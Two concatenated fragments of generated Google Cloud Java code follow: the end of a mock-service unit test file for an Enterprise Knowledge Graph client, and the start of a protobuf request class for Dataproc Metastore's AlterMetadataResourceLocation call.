.matches()); } @Test public void cancelEntityReconciliationJobExceptionTest2() throws Exception { ApiException exception = ApiExceptionFactory.createException( new Exception(), FakeStatusCode.of(StatusCode.Code.INVALID_ARGUMENT), false); mockService.addException(exception); try { String name = "projects/project-4188/locations/location-4188/entityReconciliationJobs/entityReconciliationJob-4188"; client.cancelEntityReconciliationJob(name); Assert.fail("No exception raised"); } catch (InvalidArgumentException e) { // Expected exception. } } @Test public void deleteEntityReconciliationJobTest() throws Exception { Empty expectedResponse = Empty.newBuilder().build(); mockService.addResponse(expectedResponse); EntityReconciliationJobName name = EntityReconciliationJobName.of("[PROJECT]", "[LOCATION]", "[ENTITY_RECONCILIATION_JOB]"); client.deleteEntityReconciliationJob(name); List<String> actualRequests = mockService.getRequestPaths(); Assert.assertEquals(1, actualRequests.size()); String apiClientHeaderKey = mockService .getRequestHeaders() .get(ApiClientHeaderProvider.getDefaultApiClientHeaderKey()) .iterator() .next(); Assert.assertTrue( GaxHttpJsonProperties.getDefaultApiClientHeaderPattern() .matcher(apiClientHeaderKey) .matches()); } @Test public void deleteEntityReconciliationJobExceptionTest() throws Exception { ApiException exception = ApiExceptionFactory.createException( new Exception(), FakeStatusCode.of(StatusCode.Code.INVALID_ARGUMENT), false); mockService.addException(exception); try { EntityReconciliationJobName name = EntityReconciliationJobName.of("[PROJECT]", "[LOCATION]", "[ENTITY_RECONCILIATION_JOB]"); client.deleteEntityReconciliationJob(name); Assert.fail("No exception raised"); } catch (InvalidArgumentException e) { // Expected exception. } } @Test public void deleteEntityReconciliationJobTest2() throws Exception { Empty expectedResponse = Empty.newBuilder().build(); mockService.addResponse(expectedResponse); String name = "projects/project-4188/locations/location-4188/entityReconciliationJobs/entityReconciliationJob-4188"; client.deleteEntityReconciliationJob(name); List<String> actualRequests = mockService.getRequestPaths(); Assert.assertEquals(1, actualRequests.size()); String apiClientHeaderKey = mockService .getRequestHeaders() .get(ApiClientHeaderProvider.getDefaultApiClientHeaderKey()) .iterator() .next(); Assert.assertTrue( GaxHttpJsonProperties.getDefaultApiClientHeaderPattern() .matcher(apiClientHeaderKey) .matches()); } @Test public void deleteEntityReconciliationJobExceptionTest2() throws Exception { ApiException exception = ApiExceptionFactory.createException( new Exception(), FakeStatusCode.of(StatusCode.Code.INVALID_ARGUMENT), false); mockService.addException(exception); try { String name = "projects/project-4188/locations/location-4188/entityReconciliationJobs/entityReconciliationJob-4188"; client.deleteEntityReconciliationJob(name); Assert.fail("No exception raised"); } catch (InvalidArgumentException e) { // Expected exception. } } @Test public void lookupTest() throws Exception { LookupResponse expectedResponse = LookupResponse.newBuilder() .setContext(Value.newBuilder().setBoolValue(true).build()) .setType(Value.newBuilder().setBoolValue(true).build()) .setItemListElement(ListValue.newBuilder().build()) .build(); mockService.addResponse(expectedResponse); LocationName parent = LocationName.of("[PROJECT]", "[LOCATION]"); List<String> ids = new ArrayList<>(); LookupResponse actualResponse = client.lookup(parent, ids); Assert.assertEquals(expectedResponse, actualResponse); List<String> actualRequests = mockService.getRequestPaths(); Assert.assertEquals(1, actualRequests.size()); String apiClientHeaderKey = mockService .getRequestHeaders() .get(ApiClientHeaderProvider.getDefaultApiClientHeaderKey()) .iterator() .next(); Assert.assertTrue( GaxHttpJsonProperties.getDefaultApiClientHeaderPattern() .matcher(apiClientHeaderKey) .matches()); } @Test public void lookupExceptionTest() throws Exception { ApiException exception = ApiExceptionFactory.createException( new Exception(), FakeStatusCode.of(StatusCode.Code.INVALID_ARGUMENT), false); mockService.addException(exception); try { LocationName parent = LocationName.of("[PROJECT]", "[LOCATION]"); List<String> ids = new ArrayList<>(); client.lookup(parent, ids); Assert.fail("No exception raised"); } catch (InvalidArgumentException e) { // Expected exception. } } @Test public void lookupTest2() throws Exception { LookupResponse expectedResponse = LookupResponse.newBuilder() .setContext(Value.newBuilder().setBoolValue(true).build()) .setType(Value.newBuilder().setBoolValue(true).build()) .setItemListElement(ListValue.newBuilder().build()) .build(); mockService.addResponse(expectedResponse); String parent = "projects/project-5833/locations/location-5833"; List<String> ids = new ArrayList<>(); LookupResponse actualResponse = client.lookup(parent, ids); Assert.assertEquals(expectedResponse, actualResponse); List<String> actualRequests = mockService.getRequestPaths(); Assert.assertEquals(1, actualRequests.size()); String apiClientHeaderKey = mockService .getRequestHeaders() .get(ApiClientHeaderProvider.getDefaultApiClientHeaderKey()) .iterator() .next(); Assert.assertTrue( GaxHttpJsonProperties.getDefaultApiClientHeaderPattern() .matcher(apiClientHeaderKey) .matches()); } @Test public void lookupExceptionTest2() throws Exception { ApiException exception = ApiExceptionFactory.createException( new Exception(), FakeStatusCode.of(StatusCode.Code.INVALID_ARGUMENT), false); mockService.addException(exception); try { String parent = "projects/project-5833/locations/location-5833"; List<String> ids = new ArrayList<>(); client.lookup(parent, ids); Assert.fail("No exception raised"); } catch (InvalidArgumentException e) { // Expected exception. } } @Test public void searchTest() throws Exception { SearchResponse expectedResponse = SearchResponse.newBuilder() .setContext(Value.newBuilder().setBoolValue(true).build()) .setType(Value.newBuilder().setBoolValue(true).build()) .setItemListElement(ListValue.newBuilder().build()) .build(); mockService.addResponse(expectedResponse); LocationName parent = LocationName.of("[PROJECT]", "[LOCATION]"); String query = "query107944136"; SearchResponse actualResponse = client.search(parent, query); Assert.assertEquals(expectedResponse, actualResponse); List<String> actualRequests = mockService.getRequestPaths(); Assert.assertEquals(1, actualRequests.size()); String apiClientHeaderKey = mockService .getRequestHeaders() .get(ApiClientHeaderProvider.getDefaultApiClientHeaderKey()) .iterator() .next(); Assert.assertTrue( GaxHttpJsonProperties.getDefaultApiClientHeaderPattern() .matcher(apiClientHeaderKey) .matches()); } @Test public void searchExceptionTest() throws Exception { ApiException exception = ApiExceptionFactory.createException( new Exception(), FakeStatusCode.of(StatusCode.Code.INVALID_ARGUMENT), false); mockService.addException(exception); try { LocationName parent = LocationName.of("[PROJECT]", "[LOCATION]"); String query = "query107944136"; client.search(parent, query); Assert.fail("No exception raised"); } catch (InvalidArgumentException e) { // Expected exception. } } @Test public void searchTest2() throws Exception { SearchResponse expectedResponse = SearchResponse.newBuilder() .setContext(Value.newBuilder().setBoolValue(true).build()) .setType(Value.newBuilder().setBoolValue(true).build()) .setItemListElement(ListValue.newBuilder().build()) .build(); mockService.addResponse(expectedResponse); String parent = "projects/project-5833/locations/location-5833"; String query = "query107944136"; SearchResponse actualResponse = client.search(parent, query); Assert.assertEquals(expectedResponse, actualResponse); List<String> actualRequests = mockService.getRequestPaths(); Assert.assertEquals(1, actualRequests.size()); String apiClientHeaderKey = mockService .getRequestHeaders() .get(ApiClientHeaderProvider.getDefaultApiClientHeaderKey()) .iterator() .next(); Assert.assertTrue( GaxHttpJsonProperties.getDefaultApiClientHeaderPattern() .matcher(apiClientHeaderKey) .matches()); } @Test public void searchExceptionTest2() throws Exception { ApiException exception = ApiExceptionFactory.createException( new Exception(), FakeStatusCode.of(StatusCode.Code.INVALID_ARGUMENT), false); mockService.addException(exception); try { String parent = "projects/project-5833/locations/location-5833"; String query = "query107944136"; client.search(parent, query); Assert.fail("No exception raised"); } catch (InvalidArgumentException e) { // Expected exception. } } @Test public void lookupPublicKgTest() throws Exception { LookupPublicKgResponse expectedResponse = LookupPublicKgResponse.newBuilder() .setContext(Value.newBuilder().setBoolValue(true).build()) .setType(Value.newBuilder().setBoolValue(true).build()) .setItemListElement(ListValue.newBuilder().build()) .build(); mockService.addResponse(expectedResponse); LocationName parent = LocationName.of("[PROJECT]", "[LOCATION]"); List<String> ids = new ArrayList<>(); LookupPublicKgResponse actualResponse = client.lookupPublicKg(parent, ids); Assert.assertEquals(expectedResponse, actualResponse); List<String> actualRequests = mockService.getRequestPaths(); Assert.assertEquals(1, actualRequests.size()); String apiClientHeaderKey = mockService .getRequestHeaders() .get(ApiClientHeaderProvider.getDefaultApiClientHeaderKey()) .iterator() .next(); Assert.assertTrue( GaxHttpJsonProperties.getDefaultApiClientHeaderPattern() .matcher(apiClientHeaderKey) .matches()); } @Test public void lookupPublicKgExceptionTest() throws Exception { ApiException exception = ApiExceptionFactory.createException( new Exception(), FakeStatusCode.of(StatusCode.Code.INVALID_ARGUMENT), false); mockService.addException(exception); try { LocationName parent = LocationName.of("[PROJECT]", "[LOCATION]"); List<String> ids = new ArrayList<>(); client.lookupPublicKg(parent, ids); Assert.fail("No exception raised"); } catch (InvalidArgumentException e) { // Expected exception. } } @Test public void lookupPublicKgTest2() throws Exception { LookupPublicKgResponse expectedResponse = LookupPublicKgResponse.newBuilder() .setContext(Value.newBuilder().setBoolValue(true).build()) .setType(Value.newBuilder().setBoolValue(true).build()) .setItemListElement(ListValue.newBuilder().build()) .build(); mockService.addResponse(expectedResponse); String parent = "projects/project-5833/locations/location-5833"; List<String> ids = new ArrayList<>(); LookupPublicKgResponse actualResponse = client.lookupPublicKg(parent, ids); Assert.assertEquals(expectedResponse, actualResponse); List<String> actualRequests = mockService.getRequestPaths(); Assert.assertEquals(1, actualRequests.size()); String apiClientHeaderKey = mockService .getRequestHeaders() .get(ApiClientHeaderProvider.getDefaultApiClientHeaderKey()) .iterator() .next(); Assert.assertTrue( GaxHttpJsonProperties.getDefaultApiClientHeaderPattern() .matcher(apiClientHeaderKey) .matches()); } @Test public void lookupPublicKgExceptionTest2() throws Exception { ApiException exception = ApiExceptionFactory.createException( new Exception(), FakeStatusCode.of(StatusCode.Code.INVALID_ARGUMENT), false); mockService.addException(exception); try { String parent = "projects/project-5833/locations/location-5833"; List<String> ids = new ArrayList<>(); client.lookupPublicKg(parent, ids); Assert.fail("No exception raised"); } catch (InvalidArgumentException e) { // Expected exception. } } @Test public void searchPublicKgTest() throws Exception { SearchPublicKgResponse expectedResponse = SearchPublicKgResponse.newBuilder() .setContext(Value.newBuilder().setBoolValue(true).build()) .setType(Value.newBuilder().setBoolValue(true).build()) .setItemListElement(ListValue.newBuilder().build()) .build(); mockService.addResponse(expectedResponse); LocationName parent = LocationName.of("[PROJECT]", "[LOCATION]"); String query = "query107944136"; SearchPublicKgResponse actualResponse = client.searchPublicKg(parent, query); Assert.assertEquals(expectedResponse, actualResponse); List<String> actualRequests = mockService.getRequestPaths(); Assert.assertEquals(1, actualRequests.size()); String apiClientHeaderKey = mockService .getRequestHeaders() .get(ApiClientHeaderProvider.getDefaultApiClientHeaderKey()) .iterator() .next(); Assert.assertTrue( GaxHttpJsonProperties.getDefaultApiClientHeaderPattern() .matcher(apiClientHeaderKey) .matches()); } @Test public void searchPublicKgExceptionTest() throws Exception { ApiException exception = ApiExceptionFactory.createException( new Exception(), FakeStatusCode.of(StatusCode.Code.INVALID_ARGUMENT), false); mockService.addException(exception); try { LocationName parent = LocationName.of("[PROJECT]", "[LOCATION]"); String query = "query107944136"; client.searchPublicKg(parent, query); Assert.fail("No exception raised"); } catch (InvalidArgumentException e) { // Expected exception. } } @Test public void searchPublicKgTest2() throws Exception { SearchPublicKgResponse expectedResponse = SearchPublicKgResponse.newBuilder() .setContext(Value.newBuilder().setBoolValue(true).build()) .setType(Value.newBuilder().setBoolValue(true).build()) .setItemListElement(ListValue.newBuilder().build()) .build(); mockService.addResponse(expectedResponse); String parent = "projects/project-5833/locations/location-5833"; String query = "query107944136"; SearchPublicKgResponse actualResponse = client.searchPublicKg(parent, query); Assert.assertEquals(expectedResponse, actualResponse); List<String> actualRequests = mockService.getRequestPaths(); Assert.assertEquals(1, actualRequests.size()); String apiClientHeaderKey = mockService .getRequestHeaders() .get(ApiClientHeaderProvider.getDefaultApiClientHeaderKey()) .iterator() .next(); Assert.assertTrue( GaxHttpJsonProperties.getDefaultApiClientHeaderPattern() .matcher(apiClientHeaderKey) .matches()); } @Test public void searchPublicKgExceptionTest2() throws Exception { ApiException exception = ApiExceptionFactory.createException( new Exception(), FakeStatusCode.of(StatusCode.Code.INVALID_ARGUMENT), false); mockService.addException(exception); try { String parent = "projects/project-5833/locations/location-5833"; String query = "query107944136"; client.searchPublicKg(parent, query); Assert.fail("No exception raised"); } catch (InvalidArgumentException e) { // Expected exception. } } }
googleapis/google-cloud-java
35,736
java-dataproc-metastore/proto-google-cloud-dataproc-metastore-v1/src/main/java/com/google/cloud/metastore/v1/AlterMetadataResourceLocationRequest.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/cloud/metastore/v1/metastore.proto // Protobuf Java Version: 3.25.8 package com.google.cloud.metastore.v1; /** * * * <pre> * Request message for * [DataprocMetastore.AlterMetadataResourceLocation][google.cloud.metastore.v1.DataprocMetastore.AlterMetadataResourceLocation]. * </pre> * * Protobuf type {@code google.cloud.metastore.v1.AlterMetadataResourceLocationRequest} */ public final class AlterMetadataResourceLocationRequest extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.cloud.metastore.v1.AlterMetadataResourceLocationRequest) AlterMetadataResourceLocationRequestOrBuilder { private static final long serialVersionUID = 0L; // Use AlterMetadataResourceLocationRequest.newBuilder() to construct. private AlterMetadataResourceLocationRequest( com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private AlterMetadataResourceLocationRequest() { service_ = ""; resourceName_ = ""; locationUri_ = ""; } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new AlterMetadataResourceLocationRequest(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.metastore.v1.MetastoreProto .internal_static_google_cloud_metastore_v1_AlterMetadataResourceLocationRequest_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.metastore.v1.MetastoreProto .internal_static_google_cloud_metastore_v1_AlterMetadataResourceLocationRequest_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest.class, com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest.Builder.class); } public static final int SERVICE_FIELD_NUMBER = 1; @SuppressWarnings("serial") private volatile java.lang.Object service_ = ""; /** * * * <pre> * Required. The relative resource name of the metastore service to mutate * metadata, in the following format: * * `projects/{project_id}/locations/{location_id}/services/{service_id}`. * </pre> * * <code> * string service = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return The service. */ @java.lang.Override public java.lang.String getService() { java.lang.Object ref = service_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); service_ = s; return s; } } /** * * * <pre> * Required. The relative resource name of the metastore service to mutate * metadata, in the following format: * * `projects/{project_id}/locations/{location_id}/services/{service_id}`. * </pre> * * <code> * string service = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return The bytes for service. */ @java.lang.Override public com.google.protobuf.ByteString getServiceBytes() { java.lang.Object ref = service_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); service_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } public static final int RESOURCE_NAME_FIELD_NUMBER = 2; @SuppressWarnings("serial") private volatile java.lang.Object resourceName_ = ""; /** * * * <pre> * Required. The relative metadata resource name in the following format. * * `databases/{database_id}` * or * `databases/{database_id}/tables/{table_id}` * or * `databases/{database_id}/tables/{table_id}/partitions/{partition_id}` * </pre> * * <code>string resource_name = 2 [(.google.api.field_behavior) = REQUIRED];</code> * * @return The resourceName. */ @java.lang.Override public java.lang.String getResourceName() { java.lang.Object ref = resourceName_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); resourceName_ = s; return s; } } /** * * * <pre> * Required. The relative metadata resource name in the following format. * * `databases/{database_id}` * or * `databases/{database_id}/tables/{table_id}` * or * `databases/{database_id}/tables/{table_id}/partitions/{partition_id}` * </pre> * * <code>string resource_name = 2 [(.google.api.field_behavior) = REQUIRED];</code> * * @return The bytes for resourceName. */ @java.lang.Override public com.google.protobuf.ByteString getResourceNameBytes() { java.lang.Object ref = resourceName_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); resourceName_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } public static final int LOCATION_URI_FIELD_NUMBER = 3; @SuppressWarnings("serial") private volatile java.lang.Object locationUri_ = ""; /** * * * <pre> * Required. The new location URI for the metadata resource. * </pre> * * <code>string location_uri = 3 [(.google.api.field_behavior) = REQUIRED];</code> * * @return The locationUri. */ @java.lang.Override public java.lang.String getLocationUri() { java.lang.Object ref = locationUri_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); locationUri_ = s; return s; } } /** * * * <pre> * Required. The new location URI for the metadata resource. * </pre> * * <code>string location_uri = 3 [(.google.api.field_behavior) = REQUIRED];</code> * * @return The bytes for locationUri. */ @java.lang.Override public com.google.protobuf.ByteString getLocationUriBytes() { java.lang.Object ref = locationUri_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); locationUri_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(service_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 1, service_); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(resourceName_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 2, resourceName_); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(locationUri_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 3, locationUri_); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(service_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(1, service_); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(resourceName_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(2, resourceName_); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(locationUri_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(3, locationUri_); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest)) { return super.equals(obj); } com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest other = (com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest) obj; if (!getService().equals(other.getService())) return false; if (!getResourceName().equals(other.getResourceName())) return false; if (!getLocationUri().equals(other.getLocationUri())) return false; if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); hash = (37 * hash) + SERVICE_FIELD_NUMBER; hash = (53 * hash) + getService().hashCode(); hash = (37 * hash) + RESOURCE_NAME_FIELD_NUMBER; hash = (53 * hash) + getResourceName().hashCode(); hash = (37 * hash) + LOCATION_URI_FIELD_NUMBER; hash = (53 * hash) + getLocationUri().hashCode(); hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest parseFrom( byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest parseFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest parseDelimitedFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder( com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * * * <pre> * Request message for * [DataprocMetastore.AlterMetadataResourceLocation][google.cloud.metastore.v1.DataprocMetastore.AlterMetadataResourceLocation]. * </pre> * * Protobuf type {@code google.cloud.metastore.v1.AlterMetadataResourceLocationRequest} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.cloud.metastore.v1.AlterMetadataResourceLocationRequest) com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequestOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.metastore.v1.MetastoreProto .internal_static_google_cloud_metastore_v1_AlterMetadataResourceLocationRequest_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.metastore.v1.MetastoreProto .internal_static_google_cloud_metastore_v1_AlterMetadataResourceLocationRequest_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest.class, com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest.Builder.class); } // Construct using // com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest.newBuilder() private Builder() {} private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; service_ = ""; resourceName_ = ""; locationUri_ = ""; return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.cloud.metastore.v1.MetastoreProto .internal_static_google_cloud_metastore_v1_AlterMetadataResourceLocationRequest_descriptor; } @java.lang.Override public com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest getDefaultInstanceForType() { return com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest .getDefaultInstance(); } @java.lang.Override public com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest build() { com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest buildPartial() { com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest result = new com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest(this); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartial0( com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest result) { int from_bitField0_ = bitField0_; if (((from_bitField0_ & 0x00000001) != 0)) { result.service_ = service_; } if (((from_bitField0_ & 0x00000002) != 0)) { result.resourceName_ = resourceName_; } if (((from_bitField0_ & 0x00000004) != 0)) { result.locationUri_ = locationUri_; } } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest) { return mergeFrom( (com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest) other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom( com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest other) { if (other == com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest .getDefaultInstance()) return this; if (!other.getService().isEmpty()) { service_ = other.service_; bitField0_ |= 0x00000001; onChanged(); } if (!other.getResourceName().isEmpty()) { resourceName_ = other.resourceName_; bitField0_ |= 0x00000002; onChanged(); } if (!other.getLocationUri().isEmpty()) { locationUri_ = other.locationUri_; bitField0_ |= 0x00000004; onChanged(); } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { service_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000001; break; } // case 10 case 18: { resourceName_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000002; break; } // case 18 case 26: { locationUri_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000004; break; } // case 26 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private java.lang.Object service_ = ""; /** * * * <pre> * Required. The relative resource name of the metastore service to mutate * metadata, in the following format: * * `projects/{project_id}/locations/{location_id}/services/{service_id}`. * </pre> * * <code> * string service = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return The service. */ public java.lang.String getService() { java.lang.Object ref = service_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); service_ = s; return s; } else { return (java.lang.String) ref; } } /** * * * <pre> * Required. The relative resource name of the metastore service to mutate * metadata, in the following format: * * `projects/{project_id}/locations/{location_id}/services/{service_id}`. * </pre> * * <code> * string service = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return The bytes for service. */ public com.google.protobuf.ByteString getServiceBytes() { java.lang.Object ref = service_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); service_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * * * <pre> * Required. The relative resource name of the metastore service to mutate * metadata, in the following format: * * 